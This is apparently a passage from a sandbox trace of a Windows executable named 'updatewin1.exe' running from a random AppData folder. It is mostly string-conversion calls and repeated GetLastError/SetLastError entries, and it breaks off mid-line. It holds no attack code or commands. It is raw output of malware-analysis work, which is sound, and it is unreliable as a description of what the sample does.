!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ毊ᕋ㞕AĀ", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0130.614] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x8c)ê\x1b\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0130.614] GetLastError () returned 0x0 [0130.614] SetLastError (dwErrCode=0x0) [0130.614] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0130.614] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ毊ᕋ㞕AĀ") returned 256 [0130.614] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ毊ᕋ㞕AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0130.614] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ毊ᕋ㞕AĀ", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0130.614] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x8c)ê\x1b\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0130.614] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x43a580, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\updatewin1.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\updatewin1.exe")) returned 0x5f [0130.615] GetLastError () returned 0x0 [0130.615] SetLastError (dwErrCode=0x0) [0130.615] GetLastError () returned 0x0 [0130.615] SetLastError (dwErrCode=0x0) [0130.615] GetLastError () returned 0x0 [0130.615] SetLastError (dwErrCode=0x0) [0130.615] GetLastError () returned 0x0 [0130.615] SetLastError (dwErrCode=0x0) [0130.615] GetLastError () returned 0x0 [0130.615] SetLastError (dwErrCode=0x0) [0130.615] GetLastError () returned 0x0 [0130.615] SetLastError (dwErrCode=0x0) [0130.615] GetLastError () returned 0x0 [0130.615] SetLastError (dwErrCode=0x0) [0130.615] GetLastError () returned 0x0 [0130.615] SetLastError (dwErrCode=0x0) [0130.615] GetLastError () returned 0x0 [0130.615] SetLastError (dwErrCode=0x0) [0130.615] GetLastError () returned 0x0 [0130.616] SetLastError (dwErrCode=0x0) [0130.616] GetLastError () returned 0x0 [0130.616] SetLastError (dwErrCode=0x0) [0130.616] GetLastError () returned 0x0 [0130.616] SetLastError (dwErrCode=0x0) [0130.616] GetLastError () returned 0x0 [0130.616] SetLastError (dwErrCode=0x0) [0130.616] GetLastError () returned 0x0 [0130.616] SetLastError (dwErrCode=0x0) [0130.616] GetLastError () returned 0x0 [0130.616] SetLastError (dwErrCode=0x0) [0130.616] GetLastError () returned 0x0 [0130.616] SetLastError (dwErrCode=0x0) [0130.616] GetLastError () returned 0x0 [0130.616] SetLastError (dwErrCode=0x0) [0130.616] GetLastError () returned 0x0 [0130.616] SetLastError (dwErrCode=0x0) [0130.616] GetLastError () returned 0x0 [0130.617] SetLastError (dwErrCode=0x0) [0130.617] GetLastError () returned 0x0 [0130.617] SetLastError (dwErrCode=0x0) [0130.617] GetLastError () returned 0x0 [0130.617] SetLastError (dwErrCode=0x0) [0130.617] GetLastError () returned 0x0 [0130.617] SetLastError (dwErrCode=0x0) [0130.617] GetLastError () returned 0x0 [0130.617] SetLastError (dwErrCode=0x0) [0130.617] GetLastError () returned 0x0 [0130.617] SetLastError (dwErrCode=0x0) [0130.617] GetLastError () returned 0x0 [0130.617] SetLastError (dwErrCode=0x0) [0130.617] GetLastError () returned 0x0 [0130.617] SetLastError (dwErrCode=0x0) [0130.617] GetLastError () returned 0x0 [0130.626] SetLastError (dwErrCode=0x0) [0130.626] GetLastError () returned 0x0 [0130.626] SetLastError (dwErrCode=0x0) [0130.626] GetLastError () returned 0x0 [0130.626] SetLastError (dwErrCode=0x0) [0130.626] GetLastError () returned 0x0 [0130.626] SetLastError (dwErrCode=0x0) [0130.626] GetLastError () returned 0x0 [0130.626] SetLastError (dwErrCode=0x0) [0130.626] GetLastError () returned 0x0 [0130.627] SetLastError (dwErrCode=0x0) [0130.627] GetLastError () returned 0x0 [0130.627] SetLastError (dwErrCode=0x0) [0130.627] GetLastError () returned 0x0 [0130.627] SetLastError (dwErrCode=0x0) [0130.627] GetLastError () returned 0x0 [0130.627] SetLastError (dwErrCode=0x0) [0130.627] GetLastError () returned 0x0 [0130.627] SetLastError (dwErrCode=0x0) [0130.627] GetLastError () returned 0x0 [0130.627] SetLastError (dwErrCode=0x0) [0130.627] GetLastError () returned 0x0 [0130.627] SetLastError (dwErrCode=0x0) [0130.627] GetLastError () returned 0x0 [0130.627] SetLastError (dwErrCode=0x0) [0130.627] GetLastError () returned 0x0 [0130.627] SetLastError (dwErrCode=0x0) [0130.627] GetLastError () returned 0x0 [0130.628] SetLastError (dwErrCode=0x0) [0130.628] GetLastError () returned 0x0 [0130.628] SetLastError (dwErrCode=0x0) [0130.628] GetLastError () returned 0x0 [0130.628] SetLastError (dwErrCode=0x0) [0130.628] GetLastError () returned 0x0 [0130.628] SetLastError (dwErrCode=0x0) [0130.628] GetLastError () returned 0x0 [0130.628] SetLastError (dwErrCode=0x0) [0130.628] GetLastError () returned 0x0 [0130.628] SetLastError (dwErrCode=0x0) [0130.628] GetLastError () returned 0x0 [0130.628] SetLastError (dwErrCode=0x0) [0130.628] GetLastError () returned 0x0 [0130.628] SetLastError (dwErrCode=0x0) [0130.628] GetLastError () returned 0x0 [0130.628] SetLastError (dwErrCode=0x0) [0130.628] GetLastError () returned 0x0 [0130.628] SetLastError (dwErrCode=0x0) [0130.629] GetLastError () returned 0x0 [0130.629] SetLastError (dwErrCode=0x0) [0130.629] GetLastError () returned 0x0 [0130.629] SetLastError (dwErrCode=0x0) [0130.629] GetLastError () returned 0x0 [0130.629] SetLastError (dwErrCode=0x0) [0130.629] GetLastError () returned 0x0 [0130.629] SetLastError (dwErrCode=0x0) [0130.629] GetLastError () returned 0x0 [0130.629] SetLastError (dwErrCode=0x0) [0130.629] GetLastError () returned 0x0 [0130.629] SetLastError (dwErrCode=0x0) [0130.629] GetLastError () returned 0x0 [0130.629] SetLastError (dwErrCode=0x0) [0130.629] GetLastError () returned 0x0 [0130.629] SetLastError (dwErrCode=0x0) [0130.629] GetLastError () returned 0x0 [0130.629] SetLastError (dwErrCode=0x0) [0130.629] GetLastError () returned 0x0 [0130.630] SetLastError (dwErrCode=0x0) [0130.630] GetLastError () returned 0x0 [0130.630] SetLastError (dwErrCode=0x0) [0130.630] GetLastError () returned 0x0 [0130.630] SetLastError (dwErrCode=0x0) [0130.630] GetLastError () returned 0x0 [0130.630] SetLastError (dwErrCode=0x0) [0130.630] GetLastError () returned 0x0 [0130.630] SetLastError (dwErrCode=0x0) [0130.630] GetLastError () returned 0x0 [0130.630] SetLastError (dwErrCode=0x0) [0130.630] GetLastError () returned 0x0 [0130.630] SetLastError (dwErrCode=0x0) [0130.630] GetLastError () returned 0x0 [0130.630] SetLastError (dwErrCode=0x0) [0130.630] GetLastError () returned 0x0 [0130.630] SetLastError (dwErrCode=0x0) [0130.630] GetLastError () returned 0x0 [0130.631] SetLastError (dwErrCode=0x0) [0130.631] GetLastError () returned 0x0 [0130.631] SetLastError (dwErrCode=0x0) [0130.631] GetLastError () returned 0x0 [0130.631] SetLastError (dwErrCode=0x0) [0130.631] GetLastError () returned 0x0 [0130.631] SetLastError (dwErrCode=0x0) [0130.631] GetLastError () returned 0x0 [0130.631] SetLastError (dwErrCode=0x0) [0130.631] GetLastError () returned 0x0 [0130.631] SetLastError (dwErrCode=0x0) [0130.631] GetLastError () returned 0x0 [0130.631] SetLastError (dwErrCode=0x0) [0130.631] GetLastError () returned 0x0 [0130.631] SetLastError (dwErrCode=0x0) [0130.631] GetLastError () returned 0x0 [0130.631] SetLastError (dwErrCode=0x0) [0130.631] GetLastError () returned 0x0 [0130.631] SetLastError (dwErrCode=0x0) [0130.632] GetLastError () returned 0x0 [0130.632] SetLastError (dwErrCode=0x0) [0130.632] GetLastError () returned 0x0 [0130.632] SetLastError (dwErrCode=0x0) [0130.632] GetLastError () returned 0x0 [0130.632] SetLastError (dwErrCode=0x0) [0130.632] GetLastError () returned 0x0 [0130.632] SetLastError (dwErrCode=0x0) [0130.632] GetLastError () returned 0x0 [0130.632] SetLastError (dwErrCode=0x0) [0130.632] GetLastError () returned 0x0 [0130.632] SetLastError (dwErrCode=0x0) [0130.632] GetLastError () returned 0x0 [0130.632] SetLastError (dwErrCode=0x0) [0130.632] GetLastError () returned 0x0 [0130.632] SetLastError (dwErrCode=0x0) [0130.632] GetLastError () returned 0x0 [0130.632] SetLastError (dwErrCode=0x0) [0130.632] GetLastError () returned 0x0 [0130.633] SetLastError (dwErrCode=0x0) [0130.633] GetLastError () returned 0x0 [0130.633] SetLastError (dwErrCode=0x0) [0130.633] GetLastError () returned 0x0 [0130.633] SetLastError (dwErrCode=0x0) [0130.633] GetLastError () returned 0x0 [0130.633] SetLastError (dwErrCode=0x0) [0130.633] GetLastError () returned 0x0 [0130.633] SetLastError (dwErrCode=0x0) [0130.633] GetLastError () returned 0x0 [0130.633] SetLastError (dwErrCode=0x0) [0130.633] GetLastError () returned 0x0 [0130.633] SetLastError (dwErrCode=0x0) [0130.633] GetLastError () returned 0x0 [0130.633] SetLastError (dwErrCode=0x0) [0130.633] GetLastError () returned 0x0 [0130.633] SetLastError (dwErrCode=0x0) [0130.633] GetLastError () returned 0x0 [0130.633] SetLastError (dwErrCode=0x0) [0130.634] GetLastError () returned 0x0 [0130.634] SetLastError (dwErrCode=0x0) [0130.634] GetLastError () returned 0x0 [0130.634] SetLastError (dwErrCode=0x0) [0130.634] GetLastError () returned 0x0 [0130.634] SetLastError (dwErrCode=0x0) [0130.634] GetLastError () returned 0x0 [0130.634] SetLastError (dwErrCode=0x0) [0130.634] GetLastError () returned 0x0 [0130.634] SetLastError (dwErrCode=0x0) [0130.634] GetLastError () returned 0x0 [0130.634] SetLastError (dwErrCode=0x0) [0130.634] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x74) returned 0x321990 [0130.634] GetLastError () returned 0x0 [0130.634] SetLastError (dwErrCode=0x0) [0130.634] GetLastError () returned 0x0 [0130.634] SetLastError (dwErrCode=0x0) [0130.634] GetLastError () returned 0x0 [0130.635] SetLastError (dwErrCode=0x0) [0130.635] GetLastError () returned 0x0 [0130.635] SetLastError (dwErrCode=0x0) [0130.635] GetLastError () returned 0x0 [0130.635] SetLastError (dwErrCode=0x0) [0130.635] GetLastError () returned 0x0 [0130.635] SetLastError (dwErrCode=0x0) [0130.635] GetLastError () returned 0x0 [0130.635] SetLastError (dwErrCode=0x0) [0130.635] GetLastError () returned 0x0 [0130.635] SetLastError (dwErrCode=0x0) [0130.635] GetLastError () returned 0x0 [0130.635] SetLastError (dwErrCode=0x0) [0130.635] GetLastError () returned 0x0 [0130.635] SetLastError (dwErrCode=0x0) [0130.635] GetLastError () returned 0x0 [0130.635] SetLastError (dwErrCode=0x0) [0130.635] GetLastError () returned 0x0 [0130.635] SetLastError (dwErrCode=0x0) [0130.636] GetLastError () returned 0x0 [0130.636] SetLastError (dwErrCode=0x0) [0130.636] GetLastError () returned 0x0 [0130.636] SetLastError (dwErrCode=0x0) [0130.636] GetLastError () returned 0x0 [0130.636] SetLastError (dwErrCode=0x0) [0130.636] GetLastError () returned 0x0 [0130.636] SetLastError (dwErrCode=0x0) [0130.636] GetLastError () returned 0x0 [0130.636] SetLastError (dwErrCode=0x0) [0130.636] GetLastError () returned 0x0 [0130.636] SetLastError (dwErrCode=0x0) [0130.636] GetLastError () returned 0x0 [0130.636] SetLastError (dwErrCode=0x0) [0130.636] GetLastError () returned 0x0 [0130.636] SetLastError (dwErrCode=0x0) [0130.636] GetLastError () returned 0x0 [0130.636] SetLastError (dwErrCode=0x0) [0130.637] GetLastError () returned 0x0 [0130.637] SetLastError (dwErrCode=0x0) [0130.637] GetLastError () returned 0x0 [0130.637] SetLastError (dwErrCode=0x0) [0130.637] GetLastError () returned 0x0 [0130.637] SetLastError (dwErrCode=0x0) [0130.637] GetLastError () returned 0x0 [0130.637] SetLastError (dwErrCode=0x0) [0130.637] GetLastError () returned 0x0 [0130.637] SetLastError (dwErrCode=0x0) [0130.637] GetLastError () returned 0x0 [0130.637] SetLastError (dwErrCode=0x0) [0130.637] GetLastError () returned 0x0 [0130.637] SetLastError (dwErrCode=0x0) [0130.637] GetLastError () returned 0x0 [0130.637] SetLastError (dwErrCode=0x0) [0130.637] GetLastError () returned 0x0 [0130.637] SetLastError (dwErrCode=0x0) [0130.637] GetLastError () returned 0x0 [0130.638] SetLastError (dwErrCode=0x0) [0130.638] GetLastError () returned 0x0 [0130.638] SetLastError (dwErrCode=0x0) [0130.638] GetLastError () returned 0x0 [0130.638] SetLastError (dwErrCode=0x0) [0130.638] GetLastError () returned 0x0 [0130.638] SetLastError (dwErrCode=0x0) [0130.638] GetLastError () returned 0x0 [0130.638] SetLastError (dwErrCode=0x0) [0130.638] GetLastError () returned 0x0 [0130.638] SetLastError (dwErrCode=0x0) [0130.638] GetLastError () returned 0x0 [0130.638] SetLastError (dwErrCode=0x0) [0130.638] GetLastError () returned 0x0 [0130.639] SetLastError (dwErrCode=0x0) [0130.639] GetLastError () returned 0x0 [0130.639] SetLastError (dwErrCode=0x0) [0130.639] GetLastError () returned 0x0 [0130.639] SetLastError (dwErrCode=0x0) [0130.639] GetLastError () returned 0x0 [0130.639] SetLastError (dwErrCode=0x0) [0130.639] GetLastError () returned 0x0 [0130.639] SetLastError (dwErrCode=0x0) [0130.639] GetLastError () returned 0x0 [0130.639] SetLastError (dwErrCode=0x0) [0130.639] GetLastError () returned 0x0 [0130.639] SetLastError (dwErrCode=0x0) [0130.639] GetLastError () returned 0x0 [0130.639] SetLastError (dwErrCode=0x0) [0130.639] GetLastError () returned 0x0 [0130.639] SetLastError (dwErrCode=0x0) [0130.639] GetLastError () returned 0x0 [0130.640] SetLastError (dwErrCode=0x0) [0130.640] GetLastError () returned 0x0 [0130.640] SetLastError (dwErrCode=0x0) [0130.640] GetLastError () returned 0x0 [0130.640] SetLastError (dwErrCode=0x0) [0130.640] GetLastError () returned 0x0 [0130.640] SetLastError (dwErrCode=0x0) [0130.640] GetLastError () returned 0x0 [0130.640] SetLastError (dwErrCode=0x0) [0130.640] GetLastError () returned 0x0 [0130.640] SetLastError (dwErrCode=0x0) [0130.640] GetLastError () returned 0x0 [0130.640] SetLastError (dwErrCode=0x0) [0130.640] GetLastError () returned 0x0 [0130.640] SetLastError (dwErrCode=0x0) [0130.640] GetLastError () returned 0x0 [0130.640] SetLastError (dwErrCode=0x0) [0130.640] GetLastError () returned 0x0 [0130.641] SetLastError (dwErrCode=0x0) [0130.641] GetLastError () returned 0x0 [0130.641] SetLastError (dwErrCode=0x0) [0130.641] GetLastError () returned 0x0 [0130.641] SetLastError (dwErrCode=0x0) [0130.641] GetLastError () returned 0x0 [0130.641] SetLastError (dwErrCode=0x0) [0130.641] GetLastError () returned 0x0 [0130.641] SetLastError (dwErrCode=0x0) [0130.641] GetLastError () returned 0x0 [0130.641] SetLastError (dwErrCode=0x0) [0130.641] GetLastError () returned 0x0 [0130.641] SetLastError (dwErrCode=0x0) [0130.641] GetLastError () returned 0x0 [0130.641] SetLastError (dwErrCode=0x0) [0130.641] GetLastError () returned 0x0 [0130.641] SetLastError (dwErrCode=0x0) [0130.641] GetLastError () returned 0x0 [0130.642] SetLastError (dwErrCode=0x0) [0130.642] GetLastError () returned 0x0 [0130.642] SetLastError (dwErrCode=0x0) [0130.642] GetLastError () returned 0x0 [0130.642] SetLastError (dwErrCode=0x0) [0130.642] GetLastError () returned 0x0 [0130.642] SetLastError (dwErrCode=0x0) [0130.642] GetLastError () returned 0x0 [0130.642] SetLastError (dwErrCode=0x0) [0130.642] GetLastError () returned 0x0 [0130.642] SetLastError (dwErrCode=0x0) [0130.642] GetLastError () returned 0x0 [0130.642] SetLastError (dwErrCode=0x0) [0130.642] GetLastError () returned 0x0 [0130.642] SetLastError (dwErrCode=0x0) [0130.642] GetLastError () returned 0x0 [0130.642] SetLastError (dwErrCode=0x0) [0130.642] GetLastError () returned 0x0 [0130.642] SetLastError (dwErrCode=0x0) [0130.643] GetLastError () returned 0x0 [0130.643] SetLastError (dwErrCode=0x0) [0130.643] GetLastError () returned 0x0 [0130.643] SetLastError (dwErrCode=0x0) [0130.643] GetLastError () returned 0x0 [0130.643] SetLastError (dwErrCode=0x0) [0130.643] GetLastError () returned 0x0 [0130.643] SetLastError (dwErrCode=0x0) [0130.643] GetLastError () returned 0x0 [0130.643] SetLastError (dwErrCode=0x0) [0130.643] GetLastError () returned 0x0 [0130.643] SetLastError (dwErrCode=0x0) [0130.643] GetLastError () returned 0x0 [0130.643] SetLastError (dwErrCode=0x0) [0130.643] GetLastError () returned 0x0 [0130.643] SetLastError (dwErrCode=0x0) [0130.643] GetLastError () returned 0x0 [0130.643] SetLastError (dwErrCode=0x0) [0130.643] GetLastError () returned 0x0 [0130.644] SetLastError (dwErrCode=0x0) [0130.644] GetLastError () returned 0x0 [0130.644] SetLastError (dwErrCode=0x0) [0130.644] GetLastError () returned 0x0 [0130.644] SetLastError (dwErrCode=0x0) [0130.644] GetLastError () returned 0x0 [0130.644] SetLastError (dwErrCode=0x0) [0130.644] GetLastError () returned 0x0 [0130.644] SetLastError (dwErrCode=0x0) [0130.644] GetLastError () returned 0x0 [0130.644] SetLastError (dwErrCode=0x0) [0130.644] GetLastError () returned 0x0 [0130.644] SetLastError (dwErrCode=0x0) [0130.644] GetLastError () returned 0x0 [0130.644] SetLastError (dwErrCode=0x0) [0130.644] GetLastError () returned 0x0 [0130.644] SetLastError (dwErrCode=0x0) [0130.644] GetLastError () returned 0x0 [0130.644] SetLastError (dwErrCode=0x0) [0130.645] GetLastError () returned 0x0 [0130.645] SetLastError (dwErrCode=0x0) [0130.645] GetLastError () returned 0x0 [0130.645] SetLastError (dwErrCode=0x0) [0130.645] GetLastError () returned 0x0 [0130.645] SetLastError (dwErrCode=0x0) [0130.645] GetLastError () returned 0x0 [0130.645] SetLastError (dwErrCode=0x0) [0130.645] GetLastError () returned 0x0 [0130.645] SetLastError (dwErrCode=0x0) [0130.645] GetLastError () returned 0x0 [0130.645] SetLastError (dwErrCode=0x0) [0130.645] GetLastError () returned 0x0 [0130.645] SetLastError (dwErrCode=0x0) [0130.645] GetLastError () returned 0x0 [0130.645] SetLastError (dwErrCode=0x0) [0130.645] GetLastError () returned 0x0 [0130.645] SetLastError 